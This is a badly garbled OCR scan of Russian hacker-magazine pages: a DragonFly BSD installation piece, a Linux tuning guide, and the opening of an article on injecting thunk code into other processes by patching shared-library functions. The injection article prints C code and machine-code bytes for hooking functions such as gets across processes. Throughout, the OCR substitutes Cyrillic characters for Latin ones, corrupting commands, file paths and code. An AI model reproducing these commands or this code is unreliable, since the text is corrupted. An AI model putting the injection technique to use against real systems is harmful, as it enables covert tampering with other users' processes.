2Б8 — это новая ФС от 8ип Місго8у8і:ет8. Файловая система имеет качество иного порядка. В 2Б8 реа- 
лизованы такие вкусности, как контроль целостности данных и самой ФС путем проверки контрольных 
сумм, ведение журнала транзакций, механизм «копирования при записи», логическое размещение разде- 
лов диска (по принципу БѴМ и ѵіпит), опциональное сжатие данных и многое другое. Все это делает 2Б8 
чрезвычайно надежной (&ск вообще не нужен), быстрой, масштабируемой, но при этом легкой в админис- 
трировании (не в пример БѴМ) файловой системой. 
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ШЧІХОЮ 



МЭТЬЮ 

ДИЛЛОН 

кто он? 



ПОЧЕМУ 

ЕВЕЕВ8Б-4? 



Мэтью Диллон хорошо известен в кругах разработчиков ядра. Его перу принадлежит обновленная 
система виртуальной памяти ЕгееВЗЭ, на основе его идей была переписана соответствующая часть ядра 
Ыпих. Он создатель С-компилятора для Атща08 (ПІСЕ) и планировщика задач сісгоп (ВШоп'з Сгоп). 
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та самая опция, что включает графическую консоль 



с РгееВЗЭ, обратившись к какой-нибудь 
статье или книге. Итак, предположим, что 
Интернет у нас уже есть. Дело осталось за 
малым: получить и установить ркдзгс: 

# {еІсН -о Дтр/ркдзгс.іаг.дг ДрѴЛір.ЫеШЗЭ.огд/ 
риЬ/ЫеіВЗО/раскадез/ркдзгс.Іаг.дг 
#сб/изг 

# Іаг -Х7.І Дтр/ркдзгс Таг. дт. 

# сИоѵѵп -Н гоокѵѵНееІ ркдзгс 

Далее подготовим площадку для бинарных 
пакетов (/ изг/ркд ) и установим утилиты для 
управления ими: 

# сб /изг/ркдзгс/ЬооІзІгар 

# ./Ьооізігар 

Устанавливать нужный пакет с помощью 
ркдзгс также просто, каки с помощью сис- 
темы портов РгеѳЕ>ЗЭ. Достаточно перейти 
через тематически рассортированное де- 
рево портов, найти нужный порт и набрать 
заветные Ьтаке іпзіаіі сіеап, например: 

#ссІ /изг/ркдзгс 
#сб ебііогз/ѵіт 

# Ьтаке іпзіаіі сіеап 

Так будет сформирован пакет и уста- 
новлен в каталоговую структуру /изг/ркд 
(кстати, обрати внимание, что иксы бу- 
дут установлены не в привычный /изг/ 
XII, а в /изг/ркд/хогд). Для поиска порта 
можно использовать скрипт /изг/ркдзгс/ 
ркдіосаіе. Подробное описание всех пор- 
тов можно найти в ЫтІ-файле /изг/ркдзгс/ 
НЕАОМЕ.ІіІтІ. 

Для управления пакетами используются 



утилиты, практически идентичные Ргее 
ВЗО'шным: ркд_абб, ркд_беІеіе, ркд_іпТо. 
Ко неч н о же , как и в сл у ч ае с д ру ги м и предста- 
вителями семейства Е>ЗЭ, исходники ядра и 
базовой системы можно свободно получить 
и пересобрать, выбросив ненужные компо- 
ненты и добавив то, чего не хватает. Тем, кто 
хочет прибегнуть к самостоятельной сборке, 
предлагаю следующий сценарий. Скачива- 
ем тарболл с исходниками (ЬДр://сЫатубіа. 
Із.еі.Шт.бе/риЬ/ОгадопРІу/зпарзЬоІз/згс/згс- 
ВеІеазе-1 Л.Хаг.Ъі.2 (~70 Мб)) и распаковыва- 
ем в катал ог/і/зг. Создаем новый конфигура- 
ционный файл для сборки ядра: 

#сб/изг/згс/зуз 

# ср І386/СОПѴСЕЫЕНІС і386/сопѴМУ_КЕВЫЕЕ 

Открываем конфигурационный файл и 
редактируем его в соответствии со своими 
потребностями, консультируясь по мере 
надобности с литературой по РгееВЗО. 
И главное — не забываем включить две 
опции: ЗС_РІХЕІ__МООЕ и ѴЕЗА. Это позво- 
лит устанавливать различные графичес- 
кие режимы консоли, например 1024x768 
(такая возможность впервые появилась 
именно в ЭгадопРІу, а затем была перене- 
сена в РгееВЗЭ). Далее собираем, устанав- 
ливаем ядро и перезагружаем машину: 

#сб/изг/згс 

# таке ЬиіІбкегпеІ КЕН1\ЮОМР=МУ_КЕР1МЕЕ 

# таке іпзіаіікегпеі КЕНМСОМР=МУ_КЕНЫЕЕ 

# геЬооІ 



Курсы углубленного изучения 

РІемалую роль в популяризации новой ОС 
играет ее документированность. Но при- 
менив это утверждение к ЭгадопРІу, полу- 
чим третью проблему. Число участников 
проекта слишком ограничено, нереализо- 
ванных идей слишком много, документа- 
цией заниматься просто некому. Главным 
источником информации можно было 
бы считать официальный ЬапбЬоок (ІеаТ. 
бгадопІІуЬзб.огд/щизІіп/ИапбЬоок/), если 
бы он не был сделан на скорую руку вари- 
ацией ЬапбЬоок'а РгееВЗЭ (в нем повсюду 
встречаются интересные перлы, например 
ЭгадопРІу 4.4). Некоторую интересную ин- 
формацию в небольшом количестве можно 
найти на ѵѵікі-страничке ( ѵѵікі.бгааопІІѵЬзб. 
ога У Хронологию развития ядра можно 
найти здесь: ѵѵікШгааопіІѵЬзб.ога/іпсІѳх. 
рИр/ЦзегДаагсіа/ЗіаШз Раае РеѵеІ . 
Довольно подробное описание установки 
и использования ЭгадопРІу содержится 
в серии статей Алексея Федорчука ( ипіх. 
аіпгаз.ги/Ьзб/біЬзбООО.ИітІ У Других ин- 
формационных источников мне найти не 
удалось и можно утверждать, что в целом 
документации по ЭгадопРІу очень мало. 

Эпилог 

Однажды одним из участников дискуссион- 
ного л иста ЭгадопРІу был задан вопрос: « По- 
чему вы используете эту ОС?» . Ответ был та- 
ков: «Мы верим в Мэта». Что ж, и мы поверим 
ему, а что получится из столь масштабного и 
интересного проекта — время покажет. 

ВІЫАПѴѴОІЖ’ЗЗЕ 



Почему же в то время, когда велась активная работа по подготовке к релизу ЕгееВЗЭ- 5, команда Эга^опЕІу 
выбирает код четвертой ветки в качестве основы для новой ОС? На самом деле все просто. Как отмечает сам 
Мэт Диллон, код «четверки» , не «испорченный» многочисленными нововведениями ЕгееВЗИ- 5 , как нельзя 
лучше подходит в качестве так называемой «кодовой базы» для реализации задуманных идей. 
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Один за другим начинают 
появляться І80-образы ком- ^ 
пактов различных бета-версий 
Бга§опБ 1 у. 



г Юявился пре -релиз БгащшРІѵ 

точнее, Бга^опНуВЗБ РОКСР 

Он уже имел инсталлятор — В8Б 
ІштаЛег, оформленный как уни- 
версальный установщик 
для любых В$Р)-систем. 



стадия бьша очень ко- 
роткой: спустя пару недель с 
выхода 1.0ІІС1 было объяв- 
лено о выходе полноценного 
релиза — Ога^опНуВЗБ 1 0- 
. ЯРРРА8К. 
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ДЕНИС КОЛИСНИЧЕНКО 

/ АВ§@МАІІ_.КІІ / 

Упіхоісі / 02 

Тюнинг 
домашнего 
тѵ ко а/ 

Как разогнать свой І_іпих 




Тюнинг — это тонкая настройка какого-либо компонента опера- 
ционной системы, приводящая к повышению ее производитель- 
ности. Тюнинговать можно все что угодно: отсетевой подсистемы 
до параметров виртуальной памяти. В отличие от апгрейда у тю- 
нинга есть одно неоспоримое преимущество: не нужно покупать 
дополнительное железо, следовательно, тюнинг, помимо всего 
прочего, экономит деньги. Да, на апгрейде тоже можно сэконо- 



мить, если подходить к этому процессу с умом. Например, будь у 
меня компьютер с процессором йигоп 1,2 Ѳіі2и 128 Мб оператив- 
ки, я бы лучше купил еще 256 Мб памяти, чем более мощный про- 
цессор, поскольку Линукс чувствительнее к объему оперативки, 
чем к частоте проца. Но давай сегодня отложим в сторону воп- 
росы апгрейда и уделим самое пристальное внимание тюнингу 
домашнего тукса. 



Твое собственное тюнинг-ателье 

Сначалаопределимся.какмы будем настра- 
ивать нашу систему. Предлагаю пойти по 
пути наименьшего сопротивления — вдруг 
после самого простого изменения резуль- 
тат тебя устроит, а оставшееся время мож- 
но будет потратить с большей пользой? 
Приводить систему в нерабочее состояние 
тоже не входит в наши планы, так как после 
тюнинга мы не должны потерять ни стабиль- 
ности, ни надежности, ни комфорта. Обоз- 
начим план действий: 

/ Отключение ненужных сервисов. 

Увеличение объема виртуальной памяти. 

/ Тюнингсвопа. 

Изменение работы планировщика 
процессов. 

Конфигурирование ядра. 

/ Установка новой системы инициализации. 

/ Выбор другой существующей файловой 
системы/тюнинг. 

Следует отметить, что настройка будет 
производиться на примере дистрибутива 
Ребога Соге 4. Кроме того, некоторые при- 
емы, описанные в статье, не будут работать 
со старыми ядрами (ниже 2.6). 

Отключение ненужных сервисов 

Каждый запущенный сервис «съедает» не 
только драгоценное процессорное время, 
но и память, которой постоянно не хватает. 
Что ни говори, а памяти много не бывает. 
Если бы еще нужны были все эти сервисы, 
тогда другое дело. На практике получается, 
что о назначении некоторых сервисов мы 
даже не догадываемся, а часть запущенных 
служб пытается мониторить работу тех де- 
вайсов, которых вообще нетв нашем компе. 



Так как тюнинг І_іпих планируют произвести 
напримере РС4, значит, рассмотрим серви- 
сы Федоры. По ходу статьи будут делаться 
ремарки относительно служб в Мапбгаке/ 
Мапбгіѵа. Возможно, в твоем дистрибути- 
ве присутствуют другие службы, которые 
здесь не рассмотрены, но особо не рас- 
страивайся: какой бы ни был дистрибутив, 
специальнаяпрограмманастройкипоможет 
определиться, нужен тебе тот или иной сер- 
вис или нет. В РС для настройки сервисов 
используется конфигуратор зузГет-сопІід- 
зегѵісез, а в Мапбгаке — бгакхзегѵісез. 

В целях экономии времени и журнальной 
площади остановимся только на сервисах, 
которые в большинстве случаев включены 
по умолчанию, но домашнему пользовате- 
лю не нужны — их можно смело отключить: 

асріб — управляет АСРІ-событиями. 

апасгоп, аіб, сгопб — демоны-планировщи- 
ки (запускают команды, указанные тобою, 
в указанное время). Обычному домашнему 
пользователю они ни к чему. Логику разра- 
ботчиков не понять: да, может, пользователю 
и нужен планировщик, но зачем целых три? 

/ артб — нужно оставить только на но- 
утбуках. 

/ сризрееб — изменяетчастоту СРІІ с целью 
экономии энергии, нужен на ноутбуках. 

Иаібаетоп используется для отслежива- 
ния изменений в железе системы. Вообще, 
он не нужен — достаточно запускать кибги 
после установки нового оборудования. 

/ сирз* — система печати. СІІР8 полезна 
только в том случае, когда принтер исполь- 
зуется каждый день. Если принтера нет, или 
печать производится время от времени, то 
данные сервисы можно отключить. А когда 
появится принтер — запустить заново с по- 



мощью команды «зегѵісе <имя-сервиса>». 

/ ізбп — у тебя есть ІЗОЫ? Нет? Тогда зачем 
тебе этот сервис? 

/ кибги — этого «зверя» можно запускать 
вручную, после того как в компьютер была 
установлена новая железка, кибги исполь- 
зуется для определения новых устройств 
(в Мапбгаке вместо кибги используется 
Иагббгаке2). 

/ Іт_зепзогз — используется для наблю- 
дения за различными датчиками системы 
(к примеру, наблюдение за температурой 
процессора). 

теззадеЬиз — «шина» рассылки широко- 
вещательных сообщений системы, выклю- 
чай ее. 

/ тбтопііог — используется для мониторин- 
га программных ВАЮ-массивов, в осталь- 
ных случаях (когда РАЮ не используется) 
просто не нужен. 

/ пейз — нужен для различных сетевых 
файловых систем, в том числе и для 8МВ, 
поэтому не выключай его, если вокруг тебя 
компьютеры под управлением ѴѴіпбоѵѵз, и 
нужно использовать их общие ресурсы. 

/ гтЮЫЗВезропбег, піТб — просто выключи и 
забудь. В описании сказано, что они долж- 
ны быть запущены на НоѵѵІ-клиентах для 
осуществления сервисом 2егосопІ иссле- 
дования сети. Не совсем понятно? И я о том 
же, поэтому выключаем. 

рстсіа — данный сервис нужен для под- 
держки РСМСІА-карт, которые, как все мы 
знаем, используются на ноутбуках. 

рогітар — домашнему пользователю вряд 
ли пригодится, поскольку он используется 
для управления ВРС-соединениями (дан- 
ный сервис нужен для N13 и ЫРЗ). 

/ грс* — отключай все сервисы для подде- 
ржки РРС (удаленный вызов процедур). 
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/1/ конфигуратор сігакхзѳгѵісез 



/2/ конфигурирование ядра 



/ зтагісі — нужен для ЗМАВТ-устройств (ЗеІТ 
Мопііогіпд апсі Рерогііпд ТесИпоІоду). Ин- 
терфейс ЗМАРТ используется для самотес- 
тирования устройств. Некоторые жесткие 
диски поддерживают данный интерфейс, 
поэтому если хочешь знать, когда твой вин- 
честер «запланирует» выйти из строя, не 
включай этот сервис. 

/ ззИсІ — предоставляет удаленный доступ 
к твоей системе. На домашнем компьютере 
можно смело выключить. 

/зепсітаіі — если вближайшее время непла- 
нируешь настраивать свой ЗМТР-сервер, 
а все еще отправляешь почту через ЗМТР 
своего провайдера, отключи зепсітаіі. Во 
всяком случае отключи до тех пор, пока у 
тебя не дошли руки до его настройки. 

/ гИпзсІ — сервис используется для автома- 
тического обновления продуктов от компа- 
нии Веб Наі. Я обычно отключаю его. 

/ ігдбаіапсе — нужен на ЗМР-машинах. 

Только что мы не только повысили быстро- 
действие системы, но и немного обезопаси- 
ли ее, ведь каждый запущенный сервис — 
это потенциальная дыра в безопасности. 
Теперь перезагрузи компьютер, чтобы по- 
чувствовать, насколько быстро стала за- 
гружаться твоя система. Однако не будем 
останавливаться на достигнутом. 

Увеличение объема виртуальной 
памяти 

Набери команду Ігее в консоли. Сколько 
виртуальной памяти (физическая память 
плюс область подкачки) сейчас свободно? 
Если все заполнено, например, осталось 
несколько мегабайт физической памяти и 
столько же в своп-области, значит, памяти 
катастрофически нехватает. Лучший совет 
— купить новый модуль оперативки, но пока 
попробуем создать дополнительный своп- 
файл, который добавит несколько мегабайт 
виртуальной памяти. Выполни команду: 

# бб іІ=/беѵ/гего о{=/зѵѵ-ПІе Ьз=1 т соипі=64 

Так мы создали пустой файл /зѵѵ-ТНе объ- 
емом 64 Мб. Если нужно больше, создай 
файл на 128, 256 Мб — не имеет значе- 
ния, лишь бы места на диске хватило. Те- 
перь сделаем из этого файла своп-файл 
(64/1024): 



# ткзѵѵар /зѵѵ-ТМе 65536 

Осталось задействовать новый зѵѵар: 

# зѵѵароп /зѵѵ-ТНе 

Чтобы последнюю команду не вводить каж- 
дый раз при запуске системы, пропиши ее в 
загрузочных сценариях (желательно после 
команды зѵѵароп -а), так как это временно 
решит проблемы с оперативкой. Заметь: 
для комфортной работы в І_іпих (при ис- 
пользовании X ѴѴіпбоѵѵз и КО Е/С N ОМЕ) 
нужно, как минимум, 192 Мб оперативной 
памяти, и хотя бы 128 Мб своп-памяти. На 
моей машине картина следующая: с 256 Мб 
физической ОЗУ свободно лишь 4 Мб, но 
зато своп практически свободен — занято 
обычно несколько мегабайт (своп у меня 
тоже равен 256 Мб). 

Тюнинг свопа 

Мало просто добавить несколько дополни- 
тельных мегабайт своп-памяти. Важно точ- 
но настроить сам механизм виртуальной 
памяти, а именно: правильно установить 
коэффициент подкачки. 

Предположим, что по работе приходится 
использовать несколько довольно громоз- 
дких приложений и периодически пере- 
ключаться между ними. Возможно, ты ра- 
ботаешь с документами, поэтому с самого 
утра запускаешь 00 ѴѴгіІег, 00 Саіс, РігеТох 
и переключаешься только между ними. А 
вечером запускаешь хттз, так как не пред- 
ставляешь себе работу без музыки. 

Если установить большое значение коэф- 
фициента подкачки (файл /ргос/зуз/ѵт/ 
зѵѵарріпезз), скажем, 90 или даже 100 (мак- 
симальное), то переключение между прило- 
жениями будет происходить довольно мед- 
ленно, зато производительность основного 
приложения будет максимальной. 

Если целый день приходится работать с не- 
большими программами и часто переклю- 
чаться между ними, то лучше установить 
коэффициент подкачки в районе 20 или 30. 
Поэкспериментируй с различными парамет- 
рами — только такможно подобрать для себя 
оптимальное значение. Вывести текущий 
зѵѵарріпезз можно с помощью команды: 

# саі /ргос/зуз/ѵт/зѵѵарріпезз 



Вполне возможно, тебе больше всего по- 
дойдет 70 — значение по умолчанию. Уста- 
новить новое значение (в данном случае 20) 
можно с помощью команды: 

# есііо "20" > /ргос/зуз/ѵт/зѵѵарріпезз 

Изменение работы планировщика 
ввода/вывода 

Каждой программе, работающей под І_іпих, 
время от времени необходим доступ к дис- 
ку — прочитать данные или записать их 
на диск. Часть ядра, отвечающая за пла- 
нирование ввода/вывода, так и называет- 
ся — планировщик ввода/вывода. Имеется 
четыре различных алгоритма работы пла- 
нировщика: 

Режим по умолчанию (поор) — вряд ли по- 
дойдет для продвинутого пользователя, не- 
смотря даже на то, что он используется по 
умолчанию. Суть алгоритма — это простая 
очередь типа РІРО(Рігз1Іп РігзЮиІ — Первый 
Вошел, Первый Вышел). 

Упреждающее планирование (Апіісіраіогу 
ЗсИесІиІіпд) — при чтении программой дан- 
ных с диска ядро пытается предугадать, ка- 
кие данные программа, вероятно, будет чи- 
тать при следующей операции чтения. Если 
ядро правильно угадало «мысли» програм- 
мы, то этот алгоритм позволит существенно 
повысить производительность системы. 
Кроме того, эффективность этого алгорит- 
ма сильно зависит и от логики программы. 

еІеѵа!ог=аз 

/ «Справедливая» очередь (Сотріеіе Раіг- 
пезз Оиеиіпд) — равные права для всех про- 
грамм. Ядро равномерно планирует опера- 
ции ввода/вывода для каждой программы, 
здесь нет каких-либо программ, которые 
могут монополизировать доступ к диску. 
Если несколько программ одновременно 
запросят доступ к диску, все они получат 
ответ. Данный метод в некоторых случаях 
позволяет повысить производительность 
системы, а в некоторых, наоборот, снижает 
общую производительность — все зависит 
от конкретных задач. 

еІеѵа!ог=сф 
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ШЧІХОЮ 



7 ИНСТРУМЕНТОВ 
ТЮНИНГА 



Удаляем ненужные сервисы 
Увеличиваем объем виртуальной памяти 
Настраиваем ядро 
Тюним планировщик процессов 
Оптимизируем настойки ФС 
Ставим новую систему инициализации 
Изменяем файловую систему 




ОеасІІіпе-планирование или планирование 
крайних сроков (ЭеасІІіпе Оиеиіпд) — все 
приложения, запросившие доступ к диску, 
ставятся в очередь. Из очереди извлекается 
однапрограмма, которая и получаетпракти- 
чески монопольный доступ кдиску. Пока эта 
программа работает, все остальные ожида- 
ют в очереди. По истечении определенного 
времени планировщик переводит эту про- 
грамму в состояние ожидания и переклю- 
чается на другую программу — следующую 
в очереди. Теперь вторая программа полу- 
чает доминирующий доступ к диску. Затем 
третья, четвертая и т.д. К примеру, данный 
метод хорош для сервера баз данных. 

еІеѵаЮг=сІеасІІіпе 

У каждого алгоритма есть свои преимущес- 
тва и недостатки. Но только два алгоритма 
подходят для обычного домашнего компью- 
тера — аз и сіц. Для изменения планиров- 
щика перекомпиляция ядра не требуется: 
достаточно передать параметр еіеѵаіог при 
загрузке. Чтобы каждый раз вручную не 
выполнять эту операцию, пропиши в кон- 
фигурационном файле своего загрузчика 
следующие строки: 

Фрагмент /еіс/іііо.соп! 
ітаде=/ЬооѴѵтІіпи2-2.6.9 
ІаЬеІ=І_іпих 
гооІ=/сІеѵ/НсІа1 
аррепб="еІеѵаФг=аз" 

Фрагмент /ЬооѴдгиЬ/дгиЬ.согЧ 

Ше Му йе^аиі! І_іпих 
гооЦНШ.О) 

кегпеІ/ЬооѴѵтІіпи2-2.6.9 го гоо{=/сІеѵ/І"ісІа1 
еІеѵаЮг=аз 

В случае с І_ІІ_0 по окончании редактирова- 
ния файла не забудь командой «Шо» пере- 
записать загрузчик. 

Конфигурирование ядра 

Повысить производительность системы 
может правильно сконфигурированное 
ядро. При конфигурировании ядра нужно 
следовать следующим правилам: 

Отключай неиспользуемые тобой драйве- 
раустройств, протоколы, реализации и т.д. 



Наиболее часто используемые модули 
можешь включить в ядро. Да, модуль — это 
хорошо, но если код находится в составе 
ядра, то не нужно тратить время на его за- 
грузку с диска. 

Только не переусердствуй — всему есть 
мера. Можно отключить все и оставить са- 
мый минимум, а потом, чтобы подключить 
РІазИ-диск приятеля, нужно будет снова пе- 
рекомпилировать ядро, только зачем тебе 
это нужно? 

В двух словах напомню команды для пере- 
компиляции ядра: 

# таке теписопЛд или таке хсопЯд 
#таке Ьгітаде 
#такетосІиІе5 

# таке тобиІез_іпзІаІІ 
#такеіпз{аІІ 

Первая команда запускает конфигуратор 
ядра: теписопіід работает в текстовом ре- 
жиме, основан на псигзез; хсопіід работает 
в графическом режиме. Вторая команда 
собирает само ядро. Третья и четвертая 
собирают и устанавливают модули. А пос- 
ледняя — устанавливает ядро, которое было 
собрано с помощью второй команды. 

Установка новой системы 
инициализации 

Экспериментальная система инициализа- 
ции іпііпд позволяет практически мгновен- 
но загружать І_іпих. На установку и тонкую 
настройку этой системы может уйти пара 
часов, но результат, поверь, того стоит. По 
умолчанию практически во всех дистрибу- 
тивах І_іпих используется старая добрая 
программа іпіі Именно она выполняет всю 
рутинную работу по инициализации систе- 
мы. Но «выполняет» — это громко сказано. 
По своей природе іпі{ довольно ленива: все, 
что она делает, — это анализирует файл 
/еІс/іпіПаЬ и, в зависимости от его содер- 
жимого, запускает сценарии из /еіс/гс.сі, 
которые написаны на языке командного 
интерпретатора. В следствие того, что в но- 
вой системе инициализации выполнением 
сценариев занимается сама іпкпд, загрузка 
І_іпих происходит значительно быстрее. 

За подробностями обращайся к статье 



«Молниеносная загрузка тукса» , опублико- 
ванной в предыдущем номере Хакера. 

Файловая система 

Еще несколько лет назад ни один дистрибу- 
тив не выжимал из жесткого диска все, что 
он может, соответственно, винч работал 
в режиме черепашки, и его приходилось 
«разгонять» с помощью Нсірагт. Сейчас 
вряд ли посредством этой программы мож- 
но существенно поднять производитель- 
ность винта, поскольку это сделали раз- 
работчики дистрибутива за нас. Но шанс 
произвести оптимизацию еще есть: можно 
либо изменить ехІЗІз на геізегіз/хіз/ііз, либо 
выбрать оптимальный для себя режим 
ехІЗІз. Самым быстрым режимом является 
режим обратной записи (ѵѵгіІеЬаск), так как 
в этом случае в журнал записываются толь- 
ко изменения метаданных файловой сис- 
темы. Изменить алгоритм можно в файле 
/еІсДзіаЬ, например: 

# ѵі /еіс/ (зІаЬ 

/беѵ/ИсІа1/ехІЗсІаІа=ѵѵгкеЬаск 1 О 

Самый медленный режим — 9оигпаІ — про- 
токолирует все изменения файловой сис- 
темы и метаданных. Огбегеб записывает 
только изменения метаданных, но это 
происходит перед самим изменением. Его 
выбирать не нужно, поскольку он использу- 
ется по умолчанию. 

Также могут повысить производительность 
некоторые флаги монтирования, например 
поаііте. При каждом доступе к файлу в 
іпобе файлаобновляется время последнего 
доступа, которое на практике используется 
очень редко. Параметр поаііте отключает 
обновление времени последнего доступа, 
что позволяет увеличить быстродействие 
файловой системы. 

#ѵі/е{с/(з{аЬ 

/сІеѵ/ТісІаІ / ехІЗ поа{іте,сІа{а=ѵѵгііеЬаск 1 О 

На этом тюнинг домашнего тукса можно 
считать завершенным. Если есть какие- 
нибудь вопросы, то пиши или задавай их на 
форуме моего сайта ѵѵѵѵѵѵ.бкѵѵз.ога.иа . 

ВШАВУУОЦВ’З -ц- 
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Дизайн Студии Лебедева 



Япсіех 

найдётся всё 



короче 



Для хорошей рекламы необходимо 
всего несколько слов. 

Ключевых. 




ІІПІХОІ» 



03 



ІКРИС КАСПЕР 

№ 



КАСПЕРСКИ АКА МЫЩЪХ 






■ 



СИСТЕМНЫЙ 

ШПИОНАЖг 

В'ІЧІХ — 



ШПРИЦ ДЛЯ *І\ІІХ, 

ИЛИ ФУНКЦИИ НА ИГЛЕ 



! 








ВНЕДРИТЬСЯ В АДРЕСНОЕ ПРО- 
СТРАНСТВО ЧУЖОГО ПРОЦЕС- 
СА— ПРОЩЕ ПРОСТОГО! В ПЕРВОЙ 
ЧАСТИ СТАТЬИ МЫ ПОКАЗАЛИ, 

КАК СКОНСТРУИРОВАТЬ УНИВЕР- 
САЛЬНЫЙ ШПРИЦ. ТЕПЕРЬ ОСТА- 
ЕТСЯ ТОЛЬКО ЗАМУТИТЬ ТОТ 
МАГИЧЕСКИЙ РАСТВОР, КОТОРЫЙ 
БУДЕТ ВВЕДЕН ВНУТРЬ ЧУЖЕ- 
РОДНЫХ КЛЕТОК МАШИННОГО 
КОДА. НАВСТРЕЧУ НАШЕЙ ВАК- 
ЦИНЕ ТУТ ЖЕ УСТРЕМИТСЯ БАТА- 
ЛЬОН ИММУННЫХ ТЕЛ, ГОТОВЫХ 
СОЖРАТЬ ЕЕ В ОДИН МОМЕНТ (И 
ВЕДЬ СОЖРУТ ЖЕ!). НО МЫЩЪХ 
ЗНАЕТ ОДИН ХИТРЫЙ РЕЦЕПТ... 



ШЧІХОЮ 



Введение 



Классический алгоритм внедрения збеІІ-кода выглядит так: сохраняем несколько байт перехватываемой функции и ставим 
Іитр на свой (Иипк, который делает, что задумано, выполняет сохраненные байты и передает управление оригинальной 
функции, которая может вызываться как по іитр, так и по саІІ (подробнее этот вопрос рассмотрен в статье «Капитуляция 
защитных механизмов», опубликованной в Хакере). 

Самое сложное — выбрать место для размещения (Иипк'а. Это должна быть память, доступная всем процессам, а такой 
памяти в нашем распоряжении нет! Мы знаем, что «подопытная» библиотека претендует на адресное пространство каждого 
процесса, но это пространство уже занято! Наскрести пару десятков байт, отведенных под выравнивание, вполне реально, 
только нам этого не хватает! Приходится хитрить. 

Прежде всего мы можем разместить код перехватчика в какой-нибудь «ненужной» функции, например де(з, а в начало всех 
перехватываемых функций внедрить. . . нет, не іитр (в этом случае перехватчик не сможет определить, откуда пришел вызов), 
а саІІ деіз! Внутри де(з перехватчик выталкивает из стека адрес возврата, уменьшает его на длину команды саІІ (в 32-разряд- 
ном режиме — 5 байт) и получает искомый указатель на функцию. 



установка Иоок'а 
на функцию ѵѵгііе, 
в начало которой 
внедрена команда 
перехода наде(з 



Зная указатель, можно определить имя функции — в 
этом нам поможет функция сііасісіг из ОШ Ехіепзіопз. В 
РОЗІХ она не входит, но поддерживается практически 
всеми *піх'ами , так что на этот счет можно не волновать- 
ся. Примечание: напоминаем, что при внедрении в деіз, 
равно как и в любой другой функции, мы можем пере- 
секать границы страниц, поскольку за концом текущей 
страницы наверняка находится совсем посторонняя 
область памяти ! Если же возникает необходимость мо- 
дифицировать функцию деіз целиком, то необходимо 
найти все принадлежащие ей страницы тем же самым 
методом, которым мы нашли первую из них. 

Проблема в том, что сііасісіг находится в библиотеке 
ІіЬбІ.х.зо, которой может и не быть в памяти конкретно 
взятого процесса, а если она там есть, то неизвестно, 
по какому адресу загружена. Некоторые хакеры ут- 
верждают, что віИипк-коде можно использовать только 
прямые вызовы ядра через интерфейс ІЫТ 80И, а все 
остальные функции недоступны. На самом деле это не 
так! Как показывает дизассемблер, сііасісіг — это всего 
лишь «обертка» вокруг _бІ_аббг, реализованной в ІіЬс. 
зо. х, а она-то доступна наверняка! Вот только на базо- 
вый адрес загрузки закладываться ни в коем случае 
нельзя, и вызов должен быть относительным. 
Простейшая подпрограмма генерации относительного 
вызова выглядит так: 



Подпрограмма генерирует относительный вызов и по- 
мещает его в глобальный буфер Ьи(_сосІе, ІіЬ_пате — 
имя хакаемой библиотеки, (гот — имя функции, из 
которой будет осуществляться вызов, например деіз, 
Іо — имя функции, которую нужно вызывать, например 
ѵѵгііе.сіеііа — смещение инструкции саІІ отначалаібипк- 
кода: 

//саІІОООООН 

ипзідпесі сбаг Ьи(_сосІе[]={0хЕ8, 0x0, 0x0, 0x0, 0x0}; 

саІІ_г(сНаг *ІіЬ_пате, сНаг *(гот, сНаг *Ю, іпі беііа) 

{ 

ипзідпесі сНаг *Ьазе, *(гот, Но; 

базе = бІореп(ІіЬ_пате,ВТІ_0_Г\ЮѴѴ); і((!Ьазе) геіигп -1 ; 
(гот = сПзутфазеДгот); і( (!(гот) геіигп -1 ; 

(о = сІІзут(ЬазеДо); К (Но) геіигп -1 ; 

*((ипзідпесІ іпГ)&Ьи(_сосІе[1]) =\ 

(о — (гот — зігео((Ьи(_сосІе) — беііа; 
ге(игп 666; 

} 

Функция саІІ_г вызывается из программы-инсталлято- 
ра, например нашей тет.с, и генерирует относитель- 
ный вызов саІІ по адресу (гот на адрес (о. Она может 
использоваться для вызова любых функций, а не толь- 
ко _бІ_аббг. 



ІОО 
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функция сііасісіг в действительности реализована в 
ІіЬс.зо, где она называется _сІІ_асІсІг 



Модернизируем программу тет.с и отпатчим функ- 
цию деіз так, чтобы она выводила символ «*» на экран. 
Мы будем вызывать функцию ѵѵгііе из библиотеки ІіЬс 
со следующими параметрами: ѵѵгііе (1 1) — обрати 

внимание на конструкцию &«*». Мы заталкиваем в стек 
символ «*» и передаем функции его указатель. А что 
еще остается делать? Сегмент данных ведь недосту- 
пен! Приходится использовать стек! При желании туда 
можно затолкать не только один символ, но и АЗСІІ2- 
строку (только не забудь потом вытолкнуть обратно — 
некоторые забывают, в результате чего имеют несба- 
лансированный стек и получают зедтепіаііоп ТаиІІ). 



Інііііѵі іі і | 



— - ІРІМн - ягі 






Модернизированный вариант программы тет.с, внедряющий в 
начало деіз вызов ѵѵгіІе(1 1 ); 

// начало ІИипк-кода. Заталкиваем в стек аргументы функции ѵѵгііе, 
но саму функцию еще не вызываем, так как не знаем ее адреса 
ипзідпесі сГіаг Ьиі_рге[]={ 0х6А,0х2А, /* ризГі 2АГі 7 

Ох8В,ОхОС, /*тоѵеЬх,езр7 
0x33,0x00, /*хогеах,еах7 
0x40, /*іпсеах7 

0x50, /* ризИ еах 7 

0x53, /* ризГі еЬх 7 

0x50 /* ризГі еах */ 






шг I И? I М I 



//сюда записывается сгенерированный относительный вызов 
функции ѵѵгііе 

ипзідпесі сГіаг Ьиі_сосІе[]={0хЕ8,0х0,0х0,0х0,0х0}; 

// конец ІГіипк-кода. Выталкиваем аргументы из стека вместе с 
символом "*" и возвращаемся по геі 
ипзідпесі сГіаг Ьиі_розІ[]={ 

0x83,0x04,0x10, /* асісі езр, 1 0 7 

ОхСЗ Г геі 7 



// буфер, в который будет записан собранный ІГіипк-код в следую- 
щей последовательности: ЬЫ_рге + ЬиСсосІе + ЬиСрозІ: 
ипзідпесі сГіаг ЬиЩзі[зігеоІ(Ьи!_рге) + зі2еоі(Ьи1_собе) + 
зІ 2 еоі(Ьиі_розЦ]; 

//генерируем относительный вызов ѵѵгііе 
саІІ_г("ІіЬс.зо.6", "деіз", "ѵѵгііе", зі 2 еоі(Ьиі_рге)); 

//собираем ІГіипк-код 
тетсру(ЬиЩз1, ЬиПрге, зі 2 еоІ(ЬиІ_рге)); 
тетсруфиЩзІ + зІ 2 еоІ(ЬиІ_рге), ЬиСсосІе, зІ 2 еоІ(Ьиі_собе)); 
тетсру(ЬиЩзІ + зігеоІфиСрге) + зІ2ео1(Ьи1_собе), ЬиСрозІ, 
